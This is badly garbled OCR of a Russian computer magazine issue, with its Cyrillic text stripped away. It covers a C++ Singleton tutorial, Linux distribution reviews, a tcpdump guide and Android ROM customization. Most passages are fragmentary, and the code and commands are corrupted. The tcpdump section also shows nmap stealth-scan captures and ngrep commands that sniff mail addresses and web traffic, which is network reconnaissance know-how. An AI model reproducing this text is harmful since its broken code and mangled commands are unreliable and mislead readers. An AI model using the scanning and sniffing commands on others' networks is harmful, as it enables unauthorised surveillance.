--max-rate 50-
50 /;

# nmap -sS -Pn -n -il active-hosts

. ,
-f- ;
-g88- ;
--data-legth
50- 50
/ filteed.
?
/. :::
096
01 / 156/ 2012

-, :
(495) 229-2222 18-800-333-2-333 ( )

www.mancard.ru
:;;
.
"'
..."'
::;
. ..
<::
:z:
<< ->>.
29.01.1998 N21326"
deeonis ldeeonisc!gmail.coml
Sigleto. , ,-
- .
, -
Windows,
use
mode
- ,
. ,
, ini-
. , ,
,
Save,
. , ,
-
,
-

, ,
,
?
,
.
.
.

, ,-
,
gSettings,
. CSettigs .
, ,
, .
.
.
,
, Sigleto.
,
, .
098
class CSettings
{
pulic :
void getSettings() { ... };

11 .. .
01/156/2012
11
--
~s.;:~~ . . ,....
f>.
,.,., .., -u,.,.,.... o
csettings gsettings;
,. ,_,..,...,.
'''
....;.-:::::..::.;-
-,
~~~~
CSettings gSettings. , , ,
_, .... ..;.
, n n n
. ,
...... .._..........,
, , gSeetings
. . . . . .. . -(1
01
n . -,
n
CSingleton;
gSettings, ,
class CSettings
n ,
.
, n
. n
. -, CSettings, ,
private :
CSettings ();
static CSettings* m_instance;
puic :
n, ,
gSettings
static CSettings* getinstance()
. ,
{
i f (m_instance == )
m_instance = new CSettings();
return m_instance;
, , n .
- :
static
.
void getSettings() { ... };
11 . . .
class csettings
{
/1
pulic :
static void getSettings () {.
-~};
// ...
/1
/1
CSettings* CSettings: :m_instance

= ;
CSettings
CSettings: :getinstance()->getSettings();
CSettings: :getSettings();
, , CSettings
n
, , .
, new.
- -
, , . ,
.
getlnstance[].
CSettings
m_i nstance, ,
n - .
, ,
. , 100 % - ,
ini-. ,
, , -
n ,
CSettings , CSettings
, n
n .
n, ,
] .
n <<>> . ,
. n
, <<
. ,
>> . .
, n .
CSingleto,
, ++
,
. , pivate ,
getlstance[], .
,

, . n
[ ,
], , -
01 / 156/ 201 2
099
getlnstance
~
. . ..
.;)
--
~ tt
~~
- -
n. n n.
-
..'/1'1 .. _
...._
--- --
.....-.....
( n }
CSingleton
template <class >
class CSingleton
,._,
w-.,. -u
static
tJ _ _ _
..
I J _ .. _..,, _ _
virtual - csingleton() {};
--------_...
....
puic :
,.,_ .._
tt,_,. .. c
,,,_.....
_.. _,_,
... ..- ..
,,~
,.,...
getinstance()
if (m_instance == )
m_instance = new ();
return m_instance;
-._..
-- - -~--~
~
...
...
t J-~I.Joo
,,,,_... ,...
,.,"_.,_.!_
1 1 1 _.... >1'
Wikipedia
protected :
CSingleton() {};
static * m_instance;
};
11 CSettings
class CSettings : puic CSingleton<CSettings>
getlnstance.
CSettings. ,
n ,
NQ 1
m_instance
, ,
CSettings , .
NQ 2, getlnstance,
, , m_instance.
NQ1, ,
CSettings ,
m_instance.

private :
CSettings ();
protected :
friend class CSingleton<CSettings>;
public :
static void getSettings() { ... };
11---
n.
, , ,
.
, . ++
n ,
getlnstance
CSingleton
n . -
I- .
Windows
CSingleton,
, :
, , ,

CSettings
n-n n,
n n
n, ++ fiend,
template <class >

class CSingleton{
puic :
new.
CSingleton
n n >>.
virtual -CSi ngleton () {};

static * getinstance()
. 00-
EnterCriticalSection( ... );
. ,
, CSingleto
if (m_instance == )
m_instance = new ();
, .
CSigleton, .
LeaveCriticalSection( ... );
return m_instance;
protected :
CSingleton() {};
static * m_instance;
};
,

CSettings,
toa
, .
ton :
s;"p to}
+ SW\etan ge!ONL\'()
Sing)eton ge!ONLYQ {
:ONLYnull) ONLY
rttuznONLY;
}
w Sing)etor();
<< >>
. , , ,
, .
100
, -. ::
01 / 156/201 2
2012

21:21
liECnATHD
n
zxz
--------~--------
UNIXOID
ginde lg i nd e ratu x.i n . u al

LINUX

,
Sabayon n

Sabayon emege
> ,
.config Calculate
Linux
1560 ,
- 866,
Sabayon
- 2625 1250
equo,

Calculate
Linux
ntoo,
, ,
:
.
,

( US
l, , >>
.
Sabayon 7
: s.g
:
GPL
Linux Mint
i686,
86_64
: l tel P etium
11, 512 RAM, 6

Gl ibc 2.13, Udev 171, . g 1.10.4, GNOM E 3.2, 4.7,
L ib e O ffice.O g 3.4.3
13 . 0 ,
S - Getoo ,
D istowat c h.co m .
PCLinuxOS

Faio E c u li ani . ,

64.
no , Mageia
Mandiva .
Gentoo
, .
Gentoo.
5.4
Seve B as e ~ :, .
102
01/ 156/20 12
>> ,
Sabayon

, .
,
6 /etc/make.cof
. ,
, ,
.
make.conf
Liv-
. (
]. Anaconda,

. ,
. , ,
,
.
, ,
man].
Sabayon
, ,
Sabayon n Entopy Stoe
. ,
wid-,
4:3
SpinBase:
GNOME;
: XFce, LXOE, Enlightenmet SpinBase/
OpeVZ ( OpenVZ].
: ,
GNOME
, t
.
.
,
SpinBase
ATI NVidia]
. :
(Fiuxbox] . 4.1
Molecule.
DAILY .
. . ,
, Calculate Linux ( Calculate
( isohybid] .
Gentoo,
Potage,
. ,
Sabayon
. .cofig
866,
Sabayon
Sabayon
2625
1560 ,
1250
].
,
/etc/skel
Entopy. , , ,
Getoo ,
.
equo:
,
,

Gentoo
CL.
mc
# equo install

14 ],
equo , , ,
apt-get: ,
, ,
smt- ( ],
.
Magneto
Stoe eqL!O ( Magneto]. Stoe
DISTROWATCH.COM
06.11.2011]
( ;. ] ,
: i .
(U S -, " , . .] ,
r
Potage. : emege ,
equo ! Package Setting],
- . ,
,
equo
.
, , ,
Sabayon
01 / 156/2012
Ca lculate Linu x (
1. Mint
2. Ubuntu
3. Fedora
4. Oeian
5. openSUSE
6. Arch
7. PCLinuxOS
8. CentOS
9. Puppy
10. Mandriva
2155
2108
1686
1318
1290
1222
1032
916
866
708
11. Mageia
12. Lu buntu
13. Scien tific
14. Zorin
15. Slackwae
16. Chakra
17. Sabayon
18. FreeBSD
19. Bodhi
20. Gentoo
627
612
575
563
563
563
557
490
478
453
],
103
UNIXOID
Calculate Linux 11.9
: calculate- lin ux. u

: GPL
REDHAT/FEDORA SLACKWARE
: i686, 86_64
: lntel Pentium 11 , 128[XFce) 512[)
RAM, 4-6
, RedHat/ F edoa Slackwae,
Kenel3.0.4, Glibc 2.23.4, Udev 164, .g 1.10.4, GNOME 2.32.1,

4.7.1, Lib e Office.Og 3.3 .4
. ,
n n
, .
Linux
CetOS , , ,
RedHat
: ICDS- Diectoy
F e doa
Sv) - [C LO) -
, ,
<< .
, >> ILDAP, mail, ftp,
Fusion Lin ux [ fusionlinux.og ). Fuduntu
j, , . .) . ,
[ f u duntu.o g ] Ubuntu,
. ,
F e doa.
Xange Linux [openxange.com ] - n-
: GNOME ICLDG), XFce ICLDX), [Calculate
, .
Media t, ), CLS ICalculate Linux

Scatch) CSS ICalculate Scatch Sv ) .
RedHat [ , CentOS]
Yellow Dog Linux [yel lowdog linux.com ]. ,
, ,
w S.
( .
. , >>
Vectolinux [w ww.
Gentoo, IR-
vecto linux.com ], ;
Gentoo Foudation . [Anthon y G. Basile)
Zenwalk [ zenwalk.og ] ,
hadened/seliux-epc.
100% Gentoo [ - Gentoo)
DeepStyle [ deepsty l e.o g.ua ] Agilialinux [
MOPSLinux, agil i alinux.u ].
, CL n .
n
Calculate 2[
) . , n cl-install,
1/va/li/Iayman/calculate/pofiles/patches ) , , ,
, , ,
, n
n n
Gub .
n- ,
n , n n
n. n
n Gpated c/fdisk. LVM
/va/calculate/linux cl - instal l.
Cho mium 05 , , .
soft RAID / t-. n

IR C , n
. , .
RAM,
, . ,
initamfs udev, ,
, n Sabayon.

11.0 , ,
Sabayon,
n, ,
~.~ ~
n [ ) . CL

equo,
lot~l
Oioltlof.
J~IIc:
~coeollnoRc:
emege,
, , << vs >>.
, n n
[ ).
u:I'01
n S.:
eselect profile list
Proyctpltp:
j tpO.renon.ntt
NPctpltp:
[ *>>) .
eselect profil e set 1
cl-instlll
-disk/dtY/sdo~2:/:et4
--set
os_insto~ll_ll_dto_drvfglrx
Gentoo. CL
- n, , US- .
n uild-
Calculate Linux n n
01/156/2012
50% ] .
2.32.
'Jo411WHIIHn!r.~
'J fl!.}(i~lf ~I t JI
XFce, Fluxbox
: V - [
1<>.
!Jfln<J~r
, ], - - [ ].

n
nolll)'kr. ...poelfiT~
], .
\1
-~ ..
-,
~~~.:'
n.I
JJU: ......, .
'71
1\f~~...
~;r.:.~~
Windows
,':~.~~
~~~~~
~~==
"
~~t
,:::.
~'::.:
Zorin OS 5.1
: zo i n-os.com
HI)'IIM
nporpi!MI'I~t-
0~::.-:.::
&:'=.':.
6SIN~C-~
GPL
i386, 86_64
lntel Pentium 11 ,512 RAM, 6
Kenel2.6.38, Glibc 2.13, Udev 167, .g 1.10.1 , GNO ME 2.32 .2,
L ibeOffice.O g 3.3 .3.1
0 Ntnu gl !
1~'*1
Liu x Mi t
Ubuntu
Ubuntu,
Windows.
[ GnoMenu, , ,
] Wi n7.
UBUNTU
, .
, . ,
Nautilus-Eiementay
Gloobus Pe v iew,
Apple Quicklook.

, Softwae Cente .
Linux Mint 11 "Katya"
Zoin
linuxmint .com
: GPL
: i386, 86_64
: lntel Pentium 11, 512 RAM, 4
Kenel2 . 6.38 - 8, Glibc 2.13, Udev 167, .g 1.10.1, GNOME 2.32 .1,
LibeOffice.Og 3.3 .2
n Ubu ntu, ,
, Linux. n [
05 Look
Cha n ge
,
,
Win7, WinXP
Ubuntu.
-lntenet ws Manage - n
- [ Chome].

PlayOnlinux
ZOS
Wine
Windowsn Ubu ntu.
Wineticks, n n
npopa .
, - [
] n Oistowatch.com,
n],
-n n. >>
Multimedia, Gaming] .
Ubuntu, LS- [3.1].
Clement
Lefebve.
n - n ,
Lite [ LXO E] Educational

[Uitimate, Business,
[n n ].
n Windows-ce.
n ,
Ubuntu,
100 %.
, ,

Ubu ntu,
. n
, . , n ,
mintMenu, n mint lnstall

mintUpdate . mintlnstal l
n : >>.
, , ,
Ubuntu
Softwa e Cente,
n , .
, -
[c ommun i ty . linuxmint.com/softwae ].
mintUpdate
: , n
, << >>.
Ubuntu,
L S -
LMOE, Oebian
Gnome XFce Rollig
elease. LMOE [201109].
GNOM E [
01 /156/2012
Zor i
05
Win7
105
UNIXOID
n
Localization Manage laddlocalel: n
n , , .
n,
. n, n

PCLinuxOS Magazine,
CAEiinux, TinyMe ZEN-minil.
IKaoshi,
Mageia 1
: mageia.og/u/
:
Po~sh
Port~se(t;1lfl
Portuquese
GPL
i586, 86_64
lntel Pentium 11, 512 RAM, 6
Kenel3.0.4, Glibc 2.12.1, Udev 173, . g 1.10.4, GNOME 2.32 .1,
4.7.4, L ibeOffice.Og 3.4.3
( Portug~11
PunjaI
Romanlan
Russi
, -
2010.
Mandiva, .
,
PCLinuxOS
Mandiva, ,
addlocale
MANDRIVA
, Mandiva
, , n
, , . ,
Mageia
PCLinuxOS
2011 Desktop
pclinuxos.com
GPL
: i586
: lntel Pentium 11, 512 RAM, 3
Kenel2.6.38.8, Glibc 2.11.2, Udev 168, . g 1.10.4, GNOME 2.32.1,
4.6.4
:
161
20
. -, 32-
GNOME.
IEuopa
150,
21. V-
32-,
64- . .
Mageia n Mandiva .
Mageia Li ve ,
. ,
2003 Mandake
! Mandival. Radically Simple .
n :
, ,
>> .
, Liv-.
. n
Cente, Mandiva . n
2007 PCLinuxOS
Mandiva .
Mageia
Contol
Rpmdake.
-, IXFce, LXOE, OpenBox GNOMEI
Mandiva
. n
, mageia.og/en/1/migate . :::t:
Full Monty Oesktop OVO, . Rolling

elease, n RPM-based.
PCLOS , n 64 - CPU.
Mageia 1.
-,
n n.
n , LibeOffice
.
URPM
PCLinuxOS
, n n

Synaptic.
n n , n
k, n n : , .
n , n-
ZOS
WINE
PLAYONLINUX
106
WINETRICKS
Mageia Mandriva,
01 /156/2012
le xec it . rul
TCPDUMP
UNI-

.
,

tcpdump.
Linux
SD- , ,
I:I:J:Itl:ll!lli
tcpdump-
, ,
.
,
tcpdump
25
UNJX.
UNJ-
Windows
li bpcap,
tcpdump.
tc pdump,
,
.
107
UNIXOID
[raot~hast
tcpdu~:
x_unixoid_ tcpdUfl'4']t; sudo tcpdUI!fl -i
vebose
ou tput
s up pess ed ,
use -v
- vv
~.&.~la n B -
f
lB -n host 192 . 168 .8 . 1 and port 53
fu l l
decode
potocol
1ist ening ~o~lanB , lt nk - type EH1BI13 ( Ethernet J, capture slze 65535 bytes
16 :22 :41 .348 185 IP 1 92. 1 68 . .1 1 . 418 > 192 . 168 .8 . 1.53 : 49244+ ? . u . ( 23J
16 :22 :41 .345182 IP 192.168 .8.1 .53 > 192 . 168. . 11.461 : 49244 /2/3 213.188 .284 .3, 77.88.21.
3, 87 . 258 .258.3 , 87 . 258.258.283 , 87.258 . 251.3 , 93.158.1 34.3 , 93 . 15.134.2 , 213.188.
193.3 !254 )
16 :22 :41 .345381 IP
> 192.1 68 .8.1 .53 :
192 .16 8 . . .7336
16 :22 :41 .352162 IP 192. 168 .8.1 .53
>
192.168. . 11 .376:
63342+
ya .ru . !23)
63342 812/3
213.188.193 .3 ,
213 . 188.2
84 .3, 77 .88.21.3, 87 .258.258.3, 87.258.258 .283 , 87.258.251.3. 93.158.134 . 3, 93 . 158 . 13

4.283 (254)
16 :22 :41 .599428 IP 1 92.16 8 . .1 1 . 37935 > 192 . 168 .8.1.53 : 43368+ R'? ~ . tns-counte . u . (36 J
16 :22 :41 .684278 IP 192.168 .8.181 . 48944 > 192 . 168 .8.1.53 : 4465+ '? yandex .st . 127)
16 :22 :41 .684422 IP 192 . 168.8.1.53 > 192.168.8..7935 : 43368 5/212 R 217 .73.288 . 219 , 2 17.73. 2
8 .228, 217 . 73.28 .2 21 , 217.73.28 . 222, R 2 17.73.288.218 1193)
16 :22 :4 1.684742 IP 192.168.8.18 1 .58447 > 192.168 .8.1.53 : 23622+ R? ~J.oR&J . tns -counte . u . 136)
16 :22 : 4 1 . 68116 IP 192.168.8.HI1.5561 4 > 192.168 .8 .1.53 : 14996+ ? mc . yandex .r-u . {38 )
16 :22 :4 1.611178 IP 192.168 .0.1 .53 > 192 . 168.8 . 181 . 48944 : 4465 5/2/3 213.188 . 193 . 215 , 213.18
.284 . 2 15, 77 .88 .2 1.2 15 ,
18 packets capt ued
87 .258.258 . 215 ,
11 packets ecei ve d fl lt e
packets dropped kenel
[ r- oot@~host x_unixold_tcpdumpHI
DNS -anpoc
tcpdump ,

, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump

?
. :
Flags [.], seq 3666073194:3666074622, ack 3281095139,

win 2, options [, , 5 val 70228462 ecr 1681724],
length 1428
93 . 158. 134 . 215 1213)
- , tcpdump
[ !:
flags - .
5 (SYN), F (FIN), (PUSH)
tcpdump
R (RST),
> s udo
tcpdump - i wlanB - 2 -n -v host 192 . 168 .e . l and port 53

tcpdump : 1istenl ng on wlanB , 1in k-t ype EtBtf3 < Ethe netJ, capt ue size 65535 bytes
16 :49 :22 . 218552 IP <tos , ttl 64 , id 8339, offset , flags FJ , t UDP <17 ), leng th 51 )
192 . 168 . . 18 1 .5387 9 > 192 . 168.8 . 1.53: 52+ ? . u . <2J

16 :49:22.224219 IP ltos 8 , t tl 64 , id , offset , flags CDFJ , proto UDP ( 17), length 282)
192 . 168 .8 . 1.53 > 1 92. 1 68. . 11 .5 79: 52 8/213 ya .ru . 87.25.25 . 283, .u . 87.25.251.
3, .u. 93 . 158.134 .3, .u. 93.158.134 .283, .u. 213.188.193.3 , . u. 213.188 . 284.3
, . u . 77 .88.21.3 , .u. 87 . 258 . 25 . 3 (254 )
2 packe t s
2 packets
captued
ece i ve d fllte
~ ~ackets dopped kenel
DNS-anpoc
data-seqno - n ,
first:last, first last-
n
n
nbytes.
ack - (ISN + 1).

window- .
options - ,
n cmss 1024> ( ).
lenght - .

, tcpdump
, ' -':
t [ , tcpd ump
! ,
:
# tcpdump -i wlane
-n
# tcpdump -i wlane - 1 -n - \
host 192.168.0.1 and port 80

, , .
-' I - DNS-.
,
:
,
, .
# tcpdump -i wlane
d port 53
- 1
-n host 192.168.0.1 \
, tcpdump, ,
-v'. IP
I- :
(tos , ttl 64, id 8339, offset , flags [DF],

proto UDP (17), length 51)
DNS-apoc tcpdump.
, DNS-apoc [ 531 192.1 68.0.101
192.168.0.1 . ?
16:22:41.340105-
- , .
[TOSI , [ LI ,
,
[ facl.
, , [,
UDP, ICMP) .
IP, ,
. , ,
. tcpdump
tcpdump, .
, host t,
, ,
tcpdump DNS- -
, ?
49244+ ? ya.ru. (231 , ,
?>>, .u,
/I- 23
# tcpdump -i wlane
- n src 192.168.0.1
. - .
,
dst,
. ,
d:
[8/2/31 [
213.180.204.3, 77.88 21.3, 87 250 250.3 .. 1.
108
# tcpdump -i wlane port not 22 and port not 53
01 /156/2012
GREP
tcp dum p
TCPDUMP
tcp dump:
i []- ,
.
g,
, .
, ,
POST
GE T
-,
n- I - DN S- .
nn- 1 - .
- th t- .
# g re p
- 1 -q - d eth e
t cp and port se
" G
J s
v, -vv, -vvv -
" \
!, , ! .
[n] -
s[n] - , !
ngrep - i 'game* Jpe rn] adult'

- d ethe > s la cke r s. t xt
-w
!.
byl i ne \
5- -
! sequece u mbes l.
- t h t- .
q- ! ! .
S - :
ng rep - i 'rcpt t o Jmail from ' tcp port smtp
- I s - .
, SS
DN S - . ! ! exce pt lel.
SY N ! - ] ,
:
, tc pdum p :
#
#
tc pdump - i wlane
- 1
t cpdu mp 'tc p[13];;2 '
- n port r ange 21- 23

? . -
. SY N .
tcpdump -i wlane
-n > 32 and <; 128
, . ,
:
#
#
t cpdump - i wlane 1 -n s rc net 192.16S.e. e/16 \

and dst net 1e.e.e.e; s or 172 . 1 . . / 1
t cpdump ' tc p[tcpflags ] & tcp- syn !;

tcpdum p :
tc pd ump -
/ I .
tcpdump,
: p oto[exp:size], t - , -
, size- ,
! 1
] . , -
1 ,
tc pdump
- ,
nm ap. , nm ap
192.168.0.100
15 : 49 :38 . 719422 IP 192.168 . . 1 . 596 24 > 19 2. 168 . . 111 . 8888: Flags [5 ], seq 1 36557188, win 32792 , options [mss 1
+6396.sackOK.T5 val 94976812 e.nop . wscale 5], length
15 : 49 :38 .719425 IP 192.168. . 111.8888 > 192. 168 . . 1.5962 4: Flags [R.J. seq . ack 136557189, win , length
15 : 49 :38 .719435 IP 192.168. . 1 . 54946 > 192.168 . 0.111.587 : Flags [5], s eq 2921975 2 1. win 32792 . options [mss 16
+396,sackOK,T5 val 9497681 2 e.nop . wsca le 5J, length
15 : 49 :38 .719438 IP 192.168 . . 111 . 587 > 192 . 168 . 0 . 1 . 54946 : Flags [R.J . s eq . ack 2 9219752 2 . win . length 0
15 : 49 :38.719449 IP 192 . 168.0.100 . 43337 > 192. 168 . 0.111. 22 : Flags [5 ], seq 2610 24 277 . win 32792 . options [mss 163
+96 , sackOK.T5 val 94976812 0,nop,wscale 5J, length
15 : 49 :38 .719457 IP 192 . 168 . . 111 . 22 > 192.168..100.433 37: Flags [5. ] , seq 349677 23 9. ac k 261 24278, win 32768,
+ options [mss 16396,sackOK,T5 val 94976812 94976812 .nop.wscale 5] , length 0
15 : 49 :38 .719463 IP 192 . 168 . .100.43337 > 192 . 168 . . 111.22 : Flags [ . J. ack 1. win 1025, options [nop,nop,T5 val 94
+976812 94976812], length
15 : 49:38.719883 IP 192.168 . . 10 . 4887 > 192 . 168.0 . 110.111: Flags [5 ], seq 472646806 , win 32792 . options [mss 16
+396.sackOK.T5 val 94976812 e,nop,wscale 5J, length 0
1. -
01 /156/2012
109
UNIXOID
16:30:16.611690 IP 192.168.0.100.48585 > 192.168.0.111.135: Flags [5], seq 1679394613. win 4096, options [mss 146
+0], length 0
16:30:16.611700 IP 192.168.0.111.135 > 192.168.0.100.48585: Flags [R.]. seq 0, ack 1679394614. win 0. length 0
+60]. length 0
16:30:16.611724 IP 192.168.0.111.8080 > 192.168.0.100.48585: Flags [R . J. seq 0, ack 1679394614. win 0. length 0
16:30:16.611738 IP 192.168.0.100.48585 > 192 . 168.0.111 . 23: Flags [5], seq 1679394613. win 2048. options [mss 1460
+ ]. length 0
16:30:16.611748 IP 192 .168.0.1 11 .23 > 192.168.0.100.48585: Flags [R .], seq 0, ack 1679394614, win 0, length 0
16:30:16.611763 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [5], seq 1679394613, win 4096. options [mss 1460
+ ], length 0
16:30:16.611789 IP 192.168.0.111 . 22 > 192.168 . 0.100.48585: Flags [5 . ], seq 625029896. ack 1679394614. win 32792.
+options [mss 16396], length 0
16:30:16.611798 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [R], seq 1679394614. win 0, length 0
+0], length 0
2. SN-
- ,
, -
SYN-nae (5 ). 8888,
, , ,
RST-nae. ,
, .
- , -
587
. ,
nmap
SYN-nae
22- (SSH) SYN-ACK:

192.168..1.43337
224277,
192.168..111.22:
Flags (5], seq
ack
>
192.168..1.48585
Flags (5],
192.168..111.22 :
seq 1679394613, ...
...
>
192.168..111.22
349677239,
>
tcpdump
2.
192.168..1.43337 :
26124278,
192.168..1.43337
>
192.168..111.22:
nmap
Flags (5.], seq
> 192.168..1.48585: Flags (5.],

ack 1679394614, ...
192.168..1.48585 > 192.168..111.22: Flags [R],
seq 1679394614, ...
192.168..111.22
seq
.. .
Flags (.], ack 1,
62529896,
, ,
RST-nae, .
SYN-ACK,
: , -,
, .
UD-. :
, ,
UD- ,
, n .
3
nmap
. ,
ICMP
uneachae:
, n
. , ,
,
nmap,
16 : 41 : 48.79831
, .
SN-
(nmap -sS). -
IP
192.168..1.612
192.168..111.18869:
16:41:48.798346 IP
192.168..1
UDP, length
192.168..111
udp port 18869
>
>
192.168 . .1:
unreachale,
ICMP
length 36
.
- ull-,
R-
(nmap -sN).
, .
,
Linux
RS-:
-, tv.adobe.com, n
,
RTMP .
tcpdump .
win
R- ,
192.168. . 111.256
192.168..1.39132
372,
length
>
Flags (],
192.168..111.256:
>
Flags (R.],
192.168..1.39132:
ms-
tcpdump -eflAi ethe -s -w - 1 strings 1 \

grep - "rtmp://.\+.flv"
FIN, URG PUSH (- ,
):
tmpdump (l kc l. net/tmp )
192.168..1.35331
flv- :
seq
$ ./rtmpdump -r 'URL'
seq
399895961,
win
192.168..111.5544
- .flv
ack
>
192.168..111.5544:
496,
>
urg
length
Flags (FPU],
192.168..1.35331:
Flags [R.],
399895962
, . -
110
01/156/2012
16:~1:~8.798310
16:~1:~8 . 7983~6
16:~1:~8.798371
16:~1:~8.79838~
16:~1:~8.798~00
16:~1:~8 . 798~12
16:~1:~8 . 798~29
16:~1:~8.798~~1
16:~1:~8.798~56
16:~1:~8.798~67
16:~1:~8.798~83
16:~1:~8.798~95
16:~1:~8.798510
16:~1:~8 . 798522
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
192.168.0.100.61020 > 192.168.0.111.18869: UDP, length 0

192.168.0.111 > 192.168.0.100: ICMP 192 . 168 . 0.100 udp port
192.168.0.100.61020 > 192.168.0.111.31335: UDP, length 0
192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.111.50919: UDP, length 0
192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.111.5~11~: UDP, length 0
192 . 168 .0.111 > 192.168.0.100: ICMP 192 . 168.0 . 100 udp port
192 . 168 .0.100.61020 > 192.168.0.111.6971: UDP, length 0
192.168 .0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.100.19663: UDP, length 0
192.168 .0 . 111 > 192 . 168.0 . 100: ICMP 192.168.0.100 udp port
192.168.0.100.61020 > 192.168.0.111.1950~: UDP, length 0
192.168.0.111 > 192.168.0 . 100: ICMP 192.168.0.100 udp port
18869
unreachale,
length 36
31335
unreachale,
length 36
50919
unreachale,
length 36
5~11~ unreachale,
length 36
5971
unreachale,
19663
length 36
unreachale ,
length 36
1950~ unreachale,
length 36
3. UD-
1-sA) tcpdump
17:48:58 .999718 IP 192.168...43949 > 173.19<:1.32. 18.00: Flags IP.J, seq 1835416245:1835417611, ack
~o~ln 557. opt lons [nop,~QJJ,TS val 9697~96 7652175631, Jength 1366
8000:
4SEIB BSSa
979
4000 4006 8813
exeete:
adc2 2812
t B22d
oose
z:
RST. , ,
nmap ,
. tcpdump
7469
d0 4361
296d 6178
2d41 6765
352 3028
7838 365f
~9 742f
<:
0:
8:
> 192.168.0.111 :
> 192 . 168.0.111: ICMP
> 192.168.0.111: ICMP
6578 2d61
52d 4 f 74
2dl
6765
74 320 <'k:l f 79 12f
2858 3131
3634 2920
3533 352
7920
6557 6562
4854 4d4c
6f 2920 4368
3833 S2 3230
3335 231 d
7874 2 f68 746d
696f 2f 7868
7 6963 6174
32 392 2a2f
6363 6570 742d
67 6970 264
d i141 6363
6765 2 S
238 d<'I 4163
6574 320 4953
7466 2d38 71
2 469 75
417 70
312 284)
23 71d 32 38d 84 1
Oxe l S:
456 6f 469 67 320
01 6:
8170:
018:
6566 l 7465
6570 742d 4:1
2d55 532 S
6365 7!f74 2d43
4f2d 3539
8:.<8190:
exetao:
69 7665
726f 3
Bd0a 5573 6572
6368
8140:
08 1 00:
f 320 S
110:
0 1 2:
138:
Oxe8f8:
I~MP
2d9c
220 69 665 2847 6563

726f 6dS 2f31 342 302
3220 5361 6661 7269 2f35
4163 6365 774 32 7465
2 6170 ? 6963 6174
74d 2 78d 2 6178
696f 6e2 f 78d 713d
> 192.168.0.111 : ICMP
86 s7 64
?:
d:
16 : 43 : 06.008305 IP 192.168.0 . 100

type-#68, length 1032
16:43:06 . 008383 IP 192.168.0.100
16:43:06.008714 IP 192.168.0.100
16:43:06.008831 IP 192.168.0.100
ete t
890:
ed8c
850:
, , I-
29
0065
t11 t:f745 5420 2f28 4854 5450 2f31

21 J t:!f 7374 29 1 772 67 f
f7 :S 26 fd dE'Ia 43f 6563
8)(8830:
ftx8840:
88
d s 731
273 6463
7 7561
71 d
861 7273
2d1 275
3878972.
... . ~.IJ . .
.. Pf: .. l ..
... -) ..... ..... m

-..G .!./1
.1 .. !>t: . ldW~o~ . go
og l e.com .. Comec
t lon: .keep-allve
.. Cache-Contro l :
.max-age=B .. User
-Agent: . oz l llat
5 . 8. : .Ltnux .
86_4) .Rpplei-Jeb
Klt/S35. 1 .CKHTL
, . llke.Gecko) .Ch
011t 1 4 . .35 .2
2.5ataltSS.I ..
Rccept: . text/htr~
l ,app l lcatlon/xh
tml+xlll.appllcat
l ontxl:Q=8.9 . /
:q=0.8 .. Rccept Encodlng: .gzlp,d

eflate.Sdch ..
ept-Language : . en
-US,en:q=0.8 .. Rc
cept -Charset: . 15
o-8859- l,utf-B; q
google.com tcpdump
, ,
.
I-
. ! , SYN)
, ,
tcpdump ,
. ,
Cisco Disco v ey Potocol ,
Cisco
.
,
tcpdump
# tcpdump -nn -v -i eth0 -s 1500

'ether[20:2]
02000'
1 \
Wieshak:
,
$ ssh root@example.ru tcpdump - w - 'port !22' \

1
wireshark -k -i -
DHCP IDISCOVER, REQUEST, INFORMI,
'-w
Wieshak ,
# tcpdump -i eth0 -vvv -s 1500 '((port 67 or \

port 68) and (udp[8:1] = 01))'
St:
, -:
$ ssh root@example.ru "tcpdump -nn -i eth1 -w -" \

snort
/etc/sort/snort.conf
-r -
g,
,
# tcpdump -i eth0 "tcp port 3 and ip[40] = 85 \

and ip[41] = 83" -s 1500 -n
l:i!:Ii
tcpdump
,
, .
# tcpdump -nnvv -r dump.cap tcp

grep -v "tcp sum ok" 1 wc -1
01 / 156/2 012
,
. :::
111
ANDROID-POWBKY

l'' .,
Andoid

,
'
____
_ ...J
goo.g!I!IHRo

fa mewo k- es . ap k.
goo .gi/vz8

Andoid .
goo.gi/Ya!IX
n .
goo.gi/P6JR
IBM .
goo.g!lsGXwa
Andoid
L~nux,
Honeycomb.

Android :~~~~: ~

~: _ ,
, .
,
Andoid ..,..
.

ndid- ! '
Andold ,
2.
3.
~
~
n ~ ~ ~
. , ,
' .

3

~
11
META-IN F,
boot.img
system.
,
,
, ,
NND- ,
- ,
.
boot.img ,
Linu x initd.
/. ,
,
BFS
NFS,
xda-developes
ClockwokMod.
,
system -
, .

Andoid
Linux.
, .
:
- : , ,
. .
in - /in /us/in Linux.

,
. ,

xda-developes
dalvikvm.
t- . /t Linux,
, , .
Andoid /data/data.
fonts- .
, ,
Doid ! Roboto Andoid 4.01 .
C l ockwokMod ,
framework- Jv- ,
lo , ,
did- . famewok-es.apk,
][J.
, , ,
lib- L inu - ,
. ,
. /lib /us /lib Linu x,

, libc !,
Andoid Bionic Glibcl, libz lgz i
, .
?
l, libss l .
- , ,
xda - developes . com.
media- :
Mobile, Windows Phone
iOS, Windows
Andoid. ,
, ,
tts- , .
F oums
usr-
. Andoid
, in. ,
Development
<< u And oid
/ us/shae.
I ROM] >>. -
CyanogenMod,
2.3 Rom>>
, ,
!, , !.
vndr- , .
f im wae <<
>> ,
xbln -
Wi-Fi.
, ,
, , -
in . ,
, ltop,
ROM
unzip:
!. CyanogenMod
:
busybox
$ mkdir -/ rom; cd -/rom

$ unzip . . / / / .zi
bash, ss h, powetop,
. .
build.prop- a, ,
.
/system/ap p
, , ,
. ,
Andoid, ,
, << >> . ,
NND- .
, Andoid l ADWLaunche
CyanogenModl . ,
LauncherPro lwww.launcherpro.com l:
Andoid ,
,
rm system/app/Launc her.apk
wget goo.gl/U9c54 - system/app/LauncherPro.apk
. ,
SETPROP
, n n -
. , Andoid
n. .
build . pop n
n setpop:
n n n
# setprop debug.sf.nobootanimation 1
n n n n
!n, i ,

. , n
Diale
One
Phone.apk
sms.apk.
Linu-n, n
cepepa
mc?
Google,
ssh-
n.
Andoid n
Go SMS
ARM
n n
NDK
. n, n
mc
n.
xda-developes n n n
Midnight
Commande. n k-n
